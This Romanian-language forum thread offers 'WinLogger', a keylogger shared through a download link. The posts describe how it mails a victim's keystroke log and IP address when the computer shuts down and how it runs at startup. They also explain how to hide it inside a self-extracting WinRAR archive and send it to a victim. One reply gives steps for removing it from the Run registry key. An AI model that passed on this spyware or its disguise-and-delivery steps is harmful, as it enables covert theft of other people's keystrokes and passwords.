Jump to content
DrGrim

WinLogger + Tool

Recommended Posts

Simplu!

Keylogger ,trimite logul+ip-ul victimei prin e-mail cand victima isi inchide calculatorul ,autorun la system startup ,inchide YahooMessenger ...nu cred ca am mai uitat nimic .Imbunatatiri vor aparea ....cu timpul .In caz ca gasiti ceva probleme amintiti-va ca sunt incepator in VB .:D

Download: http://rapidshare.com/files/209713723/WinLogger.rar.html

Link to comment
Share on other sites

Deci... ca sa nu folosesc un cont personal de gmail ca sa trimita la altii mailuri am ales ca fiecare sa isi foloseasca propia adresa . FakeYahoo+tool functiona asa ,omul care l-a facut a pus o adresa personala care dupa vreo 3 sau 4 zile era dezactivata de catre administratorul gmail si toti incepeau sa se intrebe dc nu mai merge programul,dc nu mai primeau mail cu username-ul si pass-ul victimei.De asta am ales sa fac un tool la keylogger pana gasesc o soluti mai putin "suspiciosa".

Edited by DrGrim
Link to comment
Share on other sites

mai exact face ce face orice keylogger numai ca asta iti trimite logul prin mail ,nu e genul server+client ,este numai server (winlogger.exe) dupa ce ai folosit tool-ul creezi o arhiva folosind optiunea create sfx arhive din winrar (ca sa il ascunzi) ,arhivezi winlogger+cele trei dll-uri+cele 3 fisiere generate de tool si trimiti victimei . cam atat ,logul il vei primi de ficare data cand victima isi inchide calculatorul .

Link to comment
Share on other sites

This file is neither allocated to a Premium Account, or a Collector's Account, and can therefore only be downloaded 10 times.

This limit is reached.

To download this file, the uploader either needs to transfer this file into his/her Collector's Account, or upload the file again. The file can later be moved to a Collector's Account. The uploader just needs to click the delete link of the file to get further information.

Nu mai merge sa-l iau!

Link to comment
Share on other sites

pff.... nu ma omule mie nu imi trimite nimica , parca ati fi batuti in cap unii , dupa ce stergi serverul nu mai ai probleme ...doamne fereste ,ma nu se mai deschide la startup , nu mai inregistreaza logul nu mai face nimic baaaaaa sa imi bag pl. Skyner ia uitete mata' la Processes si vezi daca iti apare winlogger.exe ,dai un kill la proces si dupa te duci frumos

HKEY_CURRENT_USER > Software > Microsoft >Windows > Run si acolo in dreapta ai sa vezi winlogger, stergi winlogger din lista si gata .

P.S Astea toate numai in cazul in care ai deschis winlogger.exe ,daca ai deschis tool-ul nu patesti nimic

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...